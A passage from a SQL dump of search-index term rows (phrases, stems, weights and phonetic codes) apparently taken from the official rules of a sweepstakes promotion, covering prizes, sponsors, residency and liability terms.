winner cannot','potenti winner cannot',0,1,1.7667,'P353456253',1,'en'),(28057,'potential winner fails','potenti winner fails',0,1,1.7333,'P353456142',1,'en'),(28058,'potential winner is','potenti winner is',0,1,1.6333,'P3534562',1,'en'),(28059,'potential winner may','potenti winner may',0,1,1.6667,'P3534565',1,'en'),(28060,'potential winner prize','potenti winner prize',0,1,1.7333,'P353456162',1,'en'),(28061,'preferences are','prefer are',0,1,1.5,'P616526',1,'en'),(28062,'preferences are final','prefer are final',0,1,1.7,'P616526154',1,'en'),(28063,'preparation','prepar',0,0,0.7333,'P61635',2,'en'),(28064,'preparation for','prepar for',0,1,1.5,'P6163516',1,'en'),(28065,'preparation for or','prepar for or',0,1,1.6,'P6163516',1,'en'),(28066,'presentation','present',0,0,0.8,'P62535',1,'en'),(28067,'presentation and','present and',0,1,1.5333,'P625353',1,'en'),(28068,'presentation and enforceability','present and enforceability',0,1,2,'P6253535162143',1,'en'),(28069,'prior','prior',0,0,0.3333,'P600',1,'en'),(28070,'prior to','prior to',0,1,1.2667,'P630',1,'en'),(28071,'prior to sposnor','prior to sposnor',0,1,1.5333,'P6321256',1,'en'),(28072,'privacy','privaci',0,0,0.4667,'P612',1,'en'),(28073,'privacy and','privaci and',0,1,1.3667,'P61253',1,'en'),(28074,'privacy and supplement','privaci and supplement',0,1,1.7333,'P6125321453',1,'en'),(28075,'privacy policy','privaci policy',0,1,1.4667,'P612142',1,'en'),(28076,'privacy policy for','privaci policy for',0,1,1.6,'P61214216',1,'en'),(28077,'privacy policy merely','privaci policy merely',0,1,1.7,'P612142564',1,'en'),(28078,'private human','privat human',0,1,1.4333,'P6135',1,'en'),(28079,'private human or','privat human or',0,1,1.5333,'P61356',1,'en'),(28080,'prize','prize',0,0,0.3333,'P620',1,'en'),(28081,'prize and','prize and',0,1,1.3,'P6253',1,'en'),(28082,'prize and the','prize and the',0,1,1.4333,'P6253',1,'en'),(28083,'prize are','prize are',0,1,1.3,'P626',1,'en'),(28084,'prize are the','prize are the',0,1,1.4333,'P6263',1,'en'),(28085,'prize at','prize at',0,1,1.2667,'P623',1,'en'),(28086,'prize at or','prize at or',0,1,1.3667,'P6236',1,'en'),(28087,'prize cannot','prize cannot',0,1,1.4,'P6253',1,'en'),(28088,'prize cannot be','prize cannot be',0,1,1.5,'P62531',1,'en'),(28089,'prize capability','prize capability',0,1,1.5333,'P62143',1,'en'),(28090,'prize capability winner','prize capability winner',0,1,1.7667,'P6214356',1,'en'),(28091,'prize claims','prize claims',0,1,1.4,'P62452',1,'en'),(28092,'prize claims or','prize claims or',0,1,1.5,'P624526',1,'en'),(28093,'prize comprises','prize comprises',0,1,1.5,'P625162',1,'en'),(28094,'prize comprises the','prize comprises the',0,1,1.6333,'P6251623',1,'en'),(28095,'prize debbie','prize debbie',0,1,1.4,'P6231',1,'en'),(28096,'prize debbie potential','prize debbie potential',0,1,1.7333,'P62313534',1,'en'),(28097,'prize evidence','prize evidence',0,1,1.4667,'P621352',1,'en'),(28098,'prize evidence any','prize evidence any',0,1,1.6,'P6213525',1,'en'),(28099,'prize immediate','prize immediate',0,1,1.5,'P6253',1,'en'),(28100,'prize immediate relatives','prize immediate relatives',0,1,1.8333,'P625364312',1,'en'),(28101,'prize integrating','prize integrating',0,1,1.5667,'P625326352',1,'en'),(28102,'prize integrating but','prize integrating but',0,1,1.7,'P62532635213',1,'en'),(28103,'prize is','prize is',0,1,1.2667,'P620',1,'en'),(28104,'prize is 1000','prize is 1000',0,1,1.4333,'P620',1,'en'),(28105,'prize is subject','prize is subject',0,1,1.5333,'P62123',1,'en'),(28106,'prize m','prize m',0,1,1.2333,'P625',1,'en'),(28107,'prize m phonephone','prize m phonephone',0,1,1.6,'P6251515',1,'en'),(28108,'prize not','prize not',0,1,1.3,'P6253',1,'en'),(28109,'prize not accepted','prize not accepted',0,1,1.6,'P6253213',1,'en'),(28110,'prize notification','prize notification',0,1,1.6,'P62531235',1,'en'),(28111,'prize notification or','prize notification or',0,1,1.7,'P625312356',1,'en'),(28112,'prize of','prize of',0,1,1.2667,'P621',1,'en'),(28113,'prize of equal','prize of equal',0,1,1.4667,'P62124',1,'en'),(28114,'prize or','prize or',0,1,1.2667,'P626',1,'en'),(28115,'prize or caused','prize or caused',0,1,1.5,'P62623',1,'en'),(28116,'prize or engagement','prize or engagement',0,1,1.6333,'P6265253',1,'en'),(28117,'prize or resulting','prize or resulting',0,1,1.6,'P62624352',1,'en'),(28118,'prize please','prize please',0,1,1.4,'P62142',1,'en'),(28119,'prize please refer','prize please refer',0,1,1.6,'P62142616',1,'en'),(28120,'prize related','prize related',0,1,1.4333,'P62643',1,'en'),(28121,'prize related activities','prize related activities',0,1,1.8,'P6264323132',1,'en'),(28122,'prize rests','prize rests',0,1,1.3667,'P626232',1,'en'),(28123,'prize rests solely','prize rests solely',0,1,1.6,'P6262324',1,'en'),(28124,'prize subject','prize subject',0,1,1.4333,'P62123',1,'en'),(28125,'prize subject to','prize subject to',0,1,1.5333,'P62123',1,'en'),(28126,'prize to','prize to',0,1,1.2667,'P623',1,'en'),(28127,'prize to be','prize to be',0,1,1.3667,'P6231',1,'en'),(28128,'prize to entrants','prize to entrants',0,1,1.5667,'P623536532',1,'en'),(28129,'prize unconditionally','prize unconditionally',0,1,1.7,'P62525354',1,'en'),(28130,'prize unconditionally m','prize unconditionally m',0,1,1.7667,'P625253545',1,'en'),(28131,'prize winner','prize winner',0,1,1.4,'P6256',1,'en'),(28132,'prize winner agrees','prize winner agrees',0,1,1.6333,'P6256262',1,'en'),(28133,'prize you','prize you',0,1,1.3,'P620',1,'en'),(28134,'prize you must','prize you must',0,1,1.4667,'P62523',1,'en'),(28135,'prizes','prize',0,0,0.4,'P620',1,'en'),(28136,'prizes are','prize are',0,1,1.3333,'P626',1,'en'),(28137,'prizes are for','prize are for',0,1,1.4667,'P62616',1,'en'),(28138,'prizes permitted','prize permitted',0,1,1.5333,'P621653',1,'en'),(28139,'prizes permitted with','prize permitted with',0,1,1.7,'P621653',1,'en'),(28140,'prizes will','prize will',0,1,1.3667,'P624',1,'en'),(28141,'prizes will be','prize will be',0,1,1.4667,'P6241',1,'en'),(28142,'process','process',0,0,0.4667,'P620',2,'en'),(28143,'process or','process or',0,1,1.3333,'P626',1,'en'),(28144,'process or the','process or the',0,1,1.4667,'P6263',1,'en'),(28145,'producers','produc',0,0,0.6,'P63262',1,'en'),(28146,'producers subsidiaries','produc subsidiaries',0,1,1.7333,'P6326212362',1,'en'),(28147,'producers subsidiaries associates','produc subsidiaries associates',0,1,2,'P632621236232',1,'en'),(28148,'program confront','program confront',0,1,1.5333,'P6265251653',1,'en'),(28149,'program confront number','program confront number',0,1,1.7667,'P6265251653516',1,'en'),(28150,'program do','program do',0,1,1.3333,'P62653',1,'en'),(28151,'program do networking','program do networking',0,1,1.7,'P62653536252',1,'en'),(28152,'prohibited or','prohibit or',0,1,1.4333,'P6136',1,'en'),(28153,'prohibited or confined','prohibit or confined',0,1,1.7333,'P613625153',1,'en'),(28154,'promoting','promot',0,0,0.6,'P65352',1,'en'),(28155,'promoting and','promot and',0,1,1.4333,'P6535253',1,'en'),(28156,'promoting and advertising','promot and advertising',0,1,1.8333,'P6535253163252',1,'en'),(28157,'promoting the','promot the',0,1,1.4333,'P653523',1,'en'),(28158,'promoting the drawings','promot the drawings',0,1,1.7333,'P653523652',1,'en'),(28159,'promotion','promot',0,0,0.6,'P6535',2,'en'),(28160,'promotion and','promot and',0,1,1.4333,'P65353',1,'en'),(28161,'promotion and is','promot and is',0,1,1.5333,'P653532',1,'en'),(28162,'promotion and or','promot and or',0,1,1.5333,'P653536',1,'en'),(28163,'promotion for','promot for',0,1,1.4333,'P653516',1,'en'),(28164,'promotion for sponsor','promot for sponsor',0,1,1.7,'P65351621526',1,'en'),(28165,'promotion on','promot on',0,1,1.4,'P6535',1,'en'),(28166,'promotion on the','promot on the',0,1,1.5333,'P65353',1,'en'),(28167,'promotion or','promot or',0,1,1.4,'P65356',1,'en'),(28168,'promotion or any','promot or any',0,1,1.5333,'P653565',1,'en'),(28169,'promotion or prize','promot or prize',0,1,1.6,'P65356162',1,'en'),(28170,'promotion period','promot period',0,1,1.5333,'P6535163',1,'en'),(28171,'promotion period awards','promot period awards',0,1,1.7667,'P6535163632',1,'en'),(28172,'promotion period entries','promot period entries',0,1,1.8,'P65351635362',1,'en'),(28173,'promotion since','promot since',0,1,1.5,'P6535252',1,'en'),(28174,'promotion since entire','promot since entire',0,1,1.7333,'P6535252536',1,'en'),(28175,'properly','properli',0,0,0.5333,'P6164',1,'en'),(28176,'properly enter','properli enter',0,1,1.4667,'P6164536',1,'en'),(28177,'properly enter by','properli enter by',0,1,1.5667,'P61645361',1,'en'),(28178,'properly failures','properli failures',0,1,1.5667,'P61641462',1,'en'),(28179,'properly failures or','properli failures or',0,1,1.6667,'P616414626',1,'en'),(28180,'prospect','prospect',0,0,0.5333,'P62123',1,'en'),(28181,'prospect winner','prospect winner',0,1,1.5,'P6212356',1,'en'),(28182,'prospect winner will','prospect winner will',0,1,1.6667,'P62123564',1,'en'),(28183,'prospects winner','prospect winner',0,1,1.5333,'P62123256',1,'en'),(28184,'prospects winner s','prospect winner s',0,1,1.6,'P621232562',1,'en'),(28185,'protocols','protocol',0,0,0.6,'P63242',1,'en'),(28186,'protocols and','protocol and',0,1,1.4333,'P6324253',1,'en'),(28187,'protocols and is','protocol and is',0,1,1.5333,'P63242532',1,'en'),(28188,'provided by the','provid by the',0,1,1.5,'P61313',1,'en'),(28189,'provided for','provid for',0,1,1.4,'P61316',1,'en'),(28190,'provided for in','provid for in',0,1,1.5,'P613165',1,'en'),(28191,'provided on','provid on',0,1,1.3667,'P6135',1,'en'),(28192,'provided on his','provid on his',0,1,1.5,'P61352',1,'en'),(28193,'provided to any','provid to any',0,1,1.5,'P6135',1,'en'),(28194,'provided to the','provid to the',0,1,1.5,'P613',1,'en'),(28195,'province','provinc',0,0,0.5333,'P6152',1,'en'),(28196,'province of','provinc of',0,1,1.3667,'P61521',1,'en'),(28197,'province of quebec','provinc of quebec',0,1,1.6,'P61521212',1,'en'),(28198,'provincial','provinci',0,0,0.6667,'P61524',1,'en'),(28199,'provincial or','provinci or',0,1,1.4333,'P615246',1,'en'),(28200,'provincial or territorial','provinci or territorial',0,1,1.8333,'P61524636364',1,'en'),(28201,'prudence','prudenc',0,0,0.5333,'P6352',1,'en'),(28202,'prudence from','prudenc from',0,1,1.4333,'P6352165',1,'en'),(28203,'prudence from among','prudenc from among',0,1,1.6333,'P63521652',1,'en'),(28204,'prudence that','prudenc that',0,1,1.4333,'P63523',1,'en'),(28205,'prudence that technical','prudenc that technical',0,1,1.7667,'P635232524',1,'en'),(28206,'publicity','public',0,0,0.6,'P423',1,'en'),(28207,'publicity rights','public rights',0,1,1.5333,'P4236232',1,'en'),(28208,'publicity rights defamation','public rights defamation',0,1,1.9,'P423623231535',1,'en'),(28209,'publish','publish',0,0,0.4667,'P420',1,'en'),(28210,'publish his','publish his',0,1,1.3667,'P420',1,'en'),(28211,'publish his her','publish his her',0,1,1.5,'P426',1,'en'),(28212,'publish winner','publish winner',0,1,1.4667,'P4256',1,'en'),(28213,'publish winner full','publish winner full',0,1,1.6333,'P425614',1,'en'),(28214,'purchase','purchas',0,0,0.5333,'P620',1,'en'),(28215,'purchase or','purchas or',0,1,1.3667,'P626',1,'en'),(28216,'purchase or payment','purchas or payment',0,1,1.6333,'P626153',1,'en'),(28217,'purposes contain','purpos contain',0,1,1.5333,'P612535',1,'en'),(28218,'purposes contain but','purpos contain but',0,1,1.6667,'P61253513',1,'en'),(28219,'purposes such','purpos such',0,1,1.4333,'P612',1,'en'),(28220,'purposes such as','purpos such as',0,1,1.5333,'P612',1,'en'),(28221,'qualifications','qualif',0,0,0.9333,'Q412352',1,'en'),(28222,'qualifications relieve','qualif relieve',0,1,1.7333,'Q412352641',1,'en'),(28223,'qualifications relieve liability','qualif relieve liability',0,1,2,'Q4123526414143',1,'en'),(28224,'quality state','qualiti state',0,1,1.4333,'Q4323',1,'en'),(28225,'quality state or','qualiti state or',0,1,1.5333,'Q43236',1,'en'),(28226,'quebec','quebec',0,0,0.4,'Q120',1,'en'),(28227,'quebec and','quebec and',0,1,1.3333,'Q1253',1,'en'),(28228,'quebec and all','quebec and all',0,1,1.4667,'Q12534',1,'en'),(28229,'question administered','question administered',0,1,1.7,'Q35352363',1,'en'),(28230,'question administered by','question administered by',0,1,1.8,'Q353523631',1,'en'),(28231,'questions','question',0,0,0.6,'Q352',1,'en'),(28232,'questions concerning','question concerning',0,1,1.6667,'Q35252652',1,'en'),(28233,'questions concerning the','question concerning the',0,1,1.8,'Q352526523',1,'en'),(28234,'r c','r c',0,1,1.1,'R200',1,'en'),(28235,'r c cable','r c cable',0,1,1.3,'R214',1,'en'),(28236,'randomly','randomli',0,0,0.5333,'R5354',1,'en'),(28237,'randomly pick','randomli pick',0,1,1.4333,'R535412',1,'en'),(28238,'randomly pick the','randomli pick the',0,1,1.5667,'R5354123',1,'en'),(28239,'reached','reach',0,0,0.4667,'R230',1,'en'),(28240,'reached for','reach for',0,1,1.3667,'R2316',1,'en'),(28241,'reached for reasons','reach for reasons',0,1,1.6333,'R2316252',1,'en'),(28242,'real estate','real estate',0,1,1.3667,'R423',1,'en'),(28243,'real estate assets','real estate assets',0,1,1.6,'R423232',1,'en'),(28244,'reasonable','reason',0,0,0.6667,'R2514',2,'en'),(28245,'reasonable commercial','reason commercial',0,1,1.7,'R251425624',1,'en'),(28246,'reasonable commercial efforts','reason commercial efforts',0,1,1.9667,'R2514256241632',1,'en'),(28247,'reasonable control','reason control',0,1,1.6,'R251425364',1,'en'),(28248,'reasonable control and','reason control and',0,1,1.7333,'R25142536453',1,'en'),(28249,'reasonable effort','reason effort',0,1,1.5667,'R2514163',1,'en'),(28250,'reasonable effort has','reason effort has',0,1,1.7,'R25141632',1,'en'),(28251,'reasons','reason',0,0,0.4667,'R252',2,'en'),(28252,'reasons unknown','reason unknown',0,1,1.5,'R252525',2,'en'),(28253,'reasons unknown after','reason unknown after',0,1,1.7,'R252525136',1,'en'),(28254,'reasons unknown or','reason unknown or',0,1,1.6,'R2525256',1,'en'),(28255,'receipt','receipt',0,0,0.4667,'R213',1,'en'),(28256,'receipt and','receipt and',0,1,1.3667,'R21353',1,'en'),(28257,'receipt and will','receipt and will',0,1,1.5333,'R213534',1,'en'),(28258,'receipt by','receipt by',0,1,1.3333,'R2131',1,'en'),(28259,'receipt by hazards','receipt by hazards',0,1,1.6,'R21312632',1,'en'),(28260,'receipt of','receipt of',0,1,1.3333,'R2131',1,'en'),(28261,'receipt of valid','receipt of valid',0,1,1.5333,'R213143',1,'en'),(28262,'receive','receiv',0,0,0.4667,'R210',1,'en'),(28263,'receive the','receiv the',0,1,1.3667,'R213',1,'en'),(28264,'receive the prize','receiv the prize',0,1,1.5667,'R213162',1,'en'),(28265,'received','receiv',0,0,0.5333,'R213',1,'en'),(28266,'received as','receiv as',0,1,1.3667,'R2132',1,'en'),(28267,'received as of','receiv as of',0,1,1.4667,'R21321',1,'en'),(28268,'received before','receiv before',0,1,1.5,'R21316',1,'en'),(28269,'received before the','receiv before the',0,1,1.6333,'R213163',1,'en'),(28270,'received by','receiv by',0,1,1.3667,'R2131',1,'en'),(28271,'received by the','receiv by the',0,1,1.5,'R21313',1,'en'),(28272,'received winner','receiv winner',0,1,1.5,'R21356',1,'en'),(28273,'received winner notice','receiv winner notice',0,1,1.7333,'R21356532',1,'en'),(28274,'received winner selection','receiv winner selection',0,1,1.8333,'R2135624235',1,'en'),(28275,'receiving','receiv',0,0,0.6,'R2152',2,'en'),(28276,'receiving further','receiv further',0,1,1.5667,'R21521636',1,'en'),(28277,'receiving further emails','receiv further emails',0,1,1.8,'R21521636542',1,'en'),(28278,'recipient','recipi',0,0,0.6,'R2153',1,'en'),(28279,'recipient entirely','recipi entirely',0,1,1.6,'R21535364',1,'en'),(28280,'recipient entirely or','recipi entirely or',0,1,1.7,'R215353646',1,'en'),(28281,'recognizable','recogniz',0,0,0.8,'R25214',1,'en'),(28282,'recognizable way','recogniz way',0,1,1.5333,'R25214',1,'en'),(28283,'recognizable way as','recogniz way as',0,1,1.6333,'R252142',1,'en'),(28284,'redeem','redeem',0,0,0.4,'R350',1,'en'),(28285,'redeem his','redeem his',0,1,1.3333,'R352',1,'en'),(28286,'redeem his her','redeem his her',0,1,1.4667,'R3526',1,'en'),(28287,'refer','refer',0,0,0.3333,'R160',2,'en'),(28288,'refer to','refer to',0,1,1.2667,'R163',2,'en'),(28289,'refer to sponsor','refer to sponsor',0,1,1.5333,'R16321526',1,'en'),(28290,'reference','refer',0,0,0.6,'R1652',1,'en'),(28291,'reference in','refer in',0,1,1.4,'R16525',1,'en'),(28292,'reference in any','refer in any',0,1,1.5333,'R16525',1,'en'),(28293,'references','refer',0,0,0.6667,'R1652',1,'en'),(28294,'references prize','refer prize',0,1,1.5333,'R1652162',1,'en'),(28295,'references prize claims','refer prize claims',0,1,1.7667,'R1652162452',1,'en'),(28296,'refund','refund',0,0,0.4,'R153',1,'en'),(28297,'refund alternative','refund alternative',0,1,1.6,'R153436531',1,'en'),(28298,'refund alternative or','refund alternative or',0,1,1.7,'R1534365316',1,'en'),(28299,'regarding disclosures','regard disclosures',0,1,1.7,'R26352324262',1,'en'),(28300,'regarding disclosures made','regard disclosures made',0,1,1.8667,'R2635232426253',1,'en'),(28301,'regarding fulfilling','regard fulfilling',0,1,1.6667,'R26352141452',1,'en'),(28302,'regarding fulfilling using','regard fulfilling using',0,1,1.8667,'R2635214145252',1,'en'),(28303,'regarding the','regard the',0,1,1.4333,'R263523',1,'en'),(28304,'regarding the collection','regard the collection',0,1,1.8,'R26352324235',1,'en'),(28305,'regarding the the','regard the the',0,1,1.5667,'R263523',1,'en'),(28306,'regardless','regardless',0,0,0.6667,'R26342',1,'en'),(28307,'regardless how','regardless how',0,1,1.4667,'R26342',1,'en'),(28308,'regardless how caused','regardless how caused',0,1,1.7,'R263423',1,'en'),(28309,'registered','regist',0,0,0.6667,'R2363',1,'en'),(28310,'registered trademark','regist trademark',0,1,1.6667,'R236363562',1,'en'),(28311,'registered trademark of','regist trademark of',0,1,1.7667,'R2363635621',1,'en'),(28312,'regulations limitations','regul limitations',0,1,1.7667,'R2435245352',1,'en'),(28313,'regulations limitations and','regul limitations and',0,1,1.9,'R243524535253',1,'en'),(28314,'related','relat',0,0,0.4667,'R430',2,'en'),(28315,'related activities','relat activities',0,1,1.6,'R4323132',1,'en'),(28316,'related activities sponsor','relat activities sponsor',0,1,1.8667,'R43231321526',1,'en'),(28317,'related activity','relat activity',0,1,1.5333,'R432313',1,'en'),(28318,'related activity and','relat activity and',0,1,1.6667,'R43231353',1,'en'),(28319,'related repayments','relat repayments',0,1,1.6,'R4361532',1,'en'),(28320,'related repayments the','relat repayments the',0,1,1.7333,'R43615323',1,'en'),(28321,'related to','relat to',0,1,1.3333,'R430',2,'en'),(28322,'related to july','relat to july',0,1,1.5,'R4324',1,'en'),(28323,'related to preparation','relat to preparation',0,1,1.7333,'R43161635',1,'en'),(28324,'relating','relat',0,0,0.5333,'R4352',1,'en'),(28325,'relating to','relat to',0,1,1.3667,'R43523',1,'en'),(28326,'relating to or','relat to or',0,1,1.4667,'R435236',1,'en'),(28327,'relating to the','relat to the',0,1,1.5,'R43523',1,'en'),(28328,'relatives','rel',0,0,0.6,'R4312',1,'en'),(28329,'relatives shall','rel shall',0,1,1.5,'R43124',1,'en'),(28330,'relatives shall mean','rel shall mean',0,1,1.6667,'R431245',1,'en'),(28331,'release','releas',0,0,0.4667,'R420',1,'en'),(28332,'release subjection','releas subjection',0,1,1.6,'R421235',1,'en'),(28333,'release subjection release','releas subjection release',0,1,1.8667,'R421235642',1,'en'),(28334,'release unless','releas unless',0,1,1.4667,'R42542',1,'en'),(28335,'release unless banned','releas unless banned',0,1,1.7,'R42542153',1,'en'),(28336,'release unless restricted','releas unless restricted',0,1,1.8333,'R42542623623',1,'en'),(28337,'release use','releas use',0,1,1.3667,'R420',1,'en'),(28338,'release use of','releas use of',0,1,1.4667,'R421',1,'en'),(28339,'relieve','reliev',0,0,0.4667,'R410',1,'en'),(28340,'relieve liability','reliev liability',0,1,1.5667,'R414143',1,'en'),(28341,'relieve liability spotlight','reliev liability spotlight',0,1,1.9,'R414143213423',1,'en'),(28342,'reparation','repar',0,0,0.6667,'R1635',1,'en'),(28343,'reparation uncover','repar uncover',0,1,1.6,'R1635216',1,'en'),(28344,'reparation uncover testimony','repar uncover testimony',0,1,1.9333,'R16352163235',1,'en'),(28345,'repayments','repay',0,0,0.6667,'R1532',1,'en'),(28346,'repayments the','repay the',0,1,1.4667,'R15323',1,'en'),(28347,'repayments the winner','repay the winner',0,1,1.7,'R1532356',1,'en'),(28348,'replace','replac',0,0,0.4667,'R142',1,'en'),(28349,'replace a','replac a',0,1,1.3,'R142',1,'en'),(28350,'replace a prize','replac a prize',0,1,1.5,'R142162',1,'en'),(28351,'replacement','replac',0,0,0.7333,'R14253',1,'en'),(28352,'replacement of','replac of',0,1,1.4667,'R142531',1,'en'),(28353,'replacement of any','replac of any',0,1,1.6,'R1425315',1,'en'),(28354,'replacing','replac',0,0,0.6,'R14252',1,'en'),(28355,'replacing of','replac of',0,1,1.4,'R142521',1,'en'),(28356,'replacing of prizes','replac of prizes',0,1,1.6333,'R14252162',1,'en'),(28357,'replicated','replic',0,0,0.6667,'R1423',1,'en'),(28358,'replicated by','replic by',0,1,1.4333,'R14231',1,'en'),(28359,'replicated by hand','replic by hand',0,1,1.6,'R1423153',1,'en'),(28360,'replied','repli',0,0,0.4667,'R143',1,'en'),(28361,'replied sponsor','repli sponsor',0,1,1.5,'R14321526',1,'en'),(28362,'replied sponsor will','repli sponsor will',0,1,1.6667,'R143215264',1,'en'),(28363,'reply','repli',0,0,0.3333,'R140',1,'en'),(28364,'reply with','repli with',0,1,1.3333,'R143',1,'en'),(28365,'reply with all','repli with all',0,1,1.4667,'R1434',1,'en'),(28366,'reports biographical','report biographical',0,1,1.6667,'R1632126124',1,'en'),(28367,'reports biographical facts','report biographical facts',0,1,1.8667,'R16321261241232',1,'en'),(28368,'representations','represent',0,0,1,'R1625352',1,'en'),(28369,'representations or','represent or',0,1,1.6,'R16253526',1,'en'),(28370,'representations or makes','represent or makes',0,1,1.8,'R1625352652',1,'en'),(28371,'reproduced entries','reproduc entries',0,1,1.6,'R163235362',1,'en'),(28372,'reproduced entries are','reproduc entries are',0,1,1.7333,'R1632353626',1,'en'),(28373,'reps solutions','rep solutions',0,1,1.4667,'R124352',1,'en'),(28374,'reps solutions successors','rep solutions successors',0,1,1.8333,'R12435262',1,'en'),(28375,'requested','request',0,0,0.6,'R230',1,'en'),(28376,'requested in','request in',0,1,1.4,'R235',1,'en'),(28377,'requested in the','request in the',0,1,1.5333,'R2353',1,'en'),(28378,'requires a','requir a',0,1,1.3333,'R262',1,'en'),(28379,'requires a person\'s','requir a person',0,1,1.6333,'R26216252',1,'en'),(28380,'requires within','requir within',0,1,1.5,'R26235',1,'en'),(28381,'requires within fourteen','requir within fourteen',0,1,1.8,'R262351635',1,'en'),(28382,'reserves','reserv',0,0,0.5333,'R2612',1,'en'),(28383,'reserves an','reserv an',0,1,1.3667,'R26125',1,'en'),(28384,'reserves an appropriate','reserv an appropriate',0,1,1.7667,'R2612516163',1,'en'),(28385,'reserves the','reserv the',0,1,1.4,'R26123',1,'en'),(28386,'reserves the authority','reserv the authority',0,1,1.7333,'R2612363',1,'en'),(28387,'reserves the right','reserv the right',0,1,1.6,'R26123623',1,'en'),(28388,'residence','resid',0,0,0.6,'R2352',1,'en'),(28389,'residence at','resid at',0,1,1.4,'R23523',1,'en'),(28390,'residence at least','resid at least',0,1,1.6,'R23523423',1,'en'),(28391,'residence entry','resid entry',0,1,1.5,'R2352536',1,'en'),(28392,'residence entry and','resid entry and',0,1,1.6333,'R235253653',1,'en'),(28393,'residence for','resid for',0,1,1.4333,'R235216',1,'en'),(28394,'residence for the','resid for the',0,1,1.5667,'R2352163',1,'en'),(28395,'residence location','resid location',0,1,1.6,'R23524235',1,'en'),(28396,'residence location on','resid location on',0,1,1.7,'R23524235',1,'en'),(28397,'resident','resid',0,0,0.5333,'R2353',1,'en'),(28398,'resident of','resid of',0,1,1.3667,'R23531',1,'en'),(28399,'resident of a','resid of a',0,1,1.4333,'R23531',1,'en'),(28400,'respect','respect',0,0,0.4667,'R2123',1,'en'),(28401,'respect to','respect to',0,1,1.3333,'R2123',1,'en'),(28402,'respect to one','respect to one',0,1,1.4667,'R21235',1,'en'),(28403,'respects','respect',0,0,0.5333,'R21232',1,'en'),(28404,'respects if','respect if',0,1,1.3667,'R212321',1,'en'),(28405,'respects if entrant\'s','respect if entrant',0,1,1.7,'R212321536532',1,'en'),(28406,'respects in','respect in',0,1,1.3667,'R212325',1,'en'),(28407,'respects in the','respect in the',0,1,1.5,'R2123253',1,'en'),(28408,'responsibilities','respons',0,0,1,'R21521432',1,'en'),(28409,'responsibilities for','respons for',0,1,1.6667,'R2152143216',1,'en'),(28410,'responsibilities for the','respons for the',0,1,1.8,'R21521432163',1,'en'),(28411,'responsibilities including','respons including',0,1,1.8667,'R21521432524352',1,'en'),(28412,'responsibilities including any','respons including any',0,1,2,'R215214325243525',1,'en'),(28413,'responsible for any','respons for any',0,1,1.6333,'R215214165',1,'en'),(28414,'restricted','restrict',0,0,0.6667,'R23623',1,'en'),(28415,'restricted a','restrict a',0,1,1.4,'R23623',1,'en'),(28416,'restricted a purchase','restrict a purchase',0,1,1.7,'R23623162',1,'en'),(28417,'restricted by','restrict by',0,1,1.4333,'R236231',1,'en'),(28418,'restricted by law','restrict by law',0,1,1.5667,'R2362314',1,'en'),(28419,'restricted to','restrict to',0,1,1.4333,'R23623',1,'en'),(28420,'restricted to impress','restrict to impress',0,1,1.7,'R236235162',1,'en'),(28421,'restricted to pattern','restrict to pattern',0,1,1.7,'R236231365',1,'en'),(28422,'rests solely','rest solely',0,1,1.4,'R2324',1,'en'),(28423,'rests solely with','rest solely with',0,1,1.5667,'R23243',1,'en'),(28424,'resulting fees','result fees',0,1,1.4667,'R2435212',1,'en'),(28425,'resulting fees linked','result fees linked',0,1,1.7,'R24352124523',1,'en'),(28426,'resulting from','result from',0,1,1.4667,'R24352165',1,'en'),(28427,'resulting from entering','result from entering',0,1,1.7667,'R243521653652',1,'en'),(28428,'resulting from utilizing','result from utilizing',0,1,1.8,'R2435216534252',1,'en'),(28429,'retail','retail',0,0,0.4,'R340',2,'en'),(28430,'retail valuation','retail valuation',0,1,1.5333,'R341435',1,'en'),(28431,'retail valuation on','retail valuation on',0,1,1.6333,'R341435',1,'en'),(28432,'retail value','retail value',0,1,1.4,'R3414',1,'en'),(28433,'retail value their','retail value their',0,1,1.6,'R341436',1,'en'),(28434,'returned','return',0,0,0.5333,'R3653',2,'en'),(28435,'returned as','return as',0,1,1.3667,'R36532',1,'en'),(28436,'returned as undeliverable','return as undeliverable',0,1,1.8333,'R365325341614',1,'en'),(28437,'returned regulations','return regulations',0,1,1.6667,'R3653624352',1,'en'),(28438,'returned regulations limitations','return regulations limitations',0,1,2,'R365362435245352',1,'en'),(28439,'reviews and','review and',0,1,1.3667,'R1253',1,'en'),(28440,'reviews and biographical','review and biographical',0,1,1.8,'R1253126124',1,'en'),(28441,'reward','reward',0,0,0.4,'R300',1,'en'),(28442,'reward s','reward s',0,1,1.2667,'R320',1,'en'),(28443,'reward s using','reward s using',0,1,1.4667,'R3252',1,'en'),(28444,'right in','right in',0,1,1.2667,'R235',1,'en'),(28445,'right in its','right in its',0,1,1.4,'R23532',1,'en'),(28446,'rights','right',0,0,0.4,'R232',1,'en'),(28447,'rights and','right and',0,1,1.3333,'R23253',1,'en'),(28448,'rights and obligations','right and obligations',0,1,1.7333,'R23253142352',1,'en'),(28449,'rights defamation','right defamation',0,1,1.5667,'R23231535',1,'en'),(28450,'rights defamation or','right defamation or',0,1,1.6667,'R232315356',1,'en'),(28451,'rigors','rigor',0,0,0.4,'R262',1,'en'),(28452,'rigors or','rigor or',0,1,1.3,'R2626',1,'en'),(28453,'rigors or unforeseen','rigor or unforeseen',0,1,1.6667,'R262651625',1,'en'),(28454,'robotic','robot',0,0,0.4667,'R132',1,'en'),(28455,'robotic or','robot or',0,1,1.3333,'R1326',1,'en'),(28456,'robotic or automated','robot or automated',0,1,1.6667,'R1326353',1,'en'),(28457,'robotically','robot',0,0,0.7333,'R1324',1,'en'),(28458,'robotically altered','robot altered',0,1,1.6333,'R1324363',1,'en'),(28459,'robotically altered or','robot altered or',0,1,1.7333,'R13243636',1,'en'),(28460,'rodale','rodal',0,0,0.4,'R340',1,'en'),(28461,'rodale corporation','rodal corporation',0,1,1.6,'R34261635',1,'en'),(28462,'rodale corporation 733','rodal corporation 733',0,1,1.7333,'R34261635',1,'en'),(28463,'rodale shall','rodal shall',0,1,1.4,'R3424',1,'en'),(28464,'rodale shall have','rodal shall have',0,1,1.5667,'R34241',1,'en'),(28465,'rough','rough',0,0,0.3333,'R200',1,'en'),(28466,'rough retail','rough retail',0,1,1.4,'R2634',1,'en'),(28467,'rough retail value','rough retail value',0,1,1.6,'R263414',1,'en'),(28468,'rules','rule',0,0,0.3333,'R420',1,'en'),(28469,'rules and','rule and',0,1,1.3,'R4253',1,'en'),(28470,'rules and agree','rule and agree',0,1,1.5,'R425326',1,'en'),(28471,'rules and the','rule and the',0,1,1.4333,'R4253',1,'en'),(28472,'rules at','rule at',0,1,1.2667,'R423',1,'en'),(28473,'rules at thelizabeth','rule at thelizabeth',0,1,1.6667,'R4234213',1,'en'),(28474,'rules in','rule 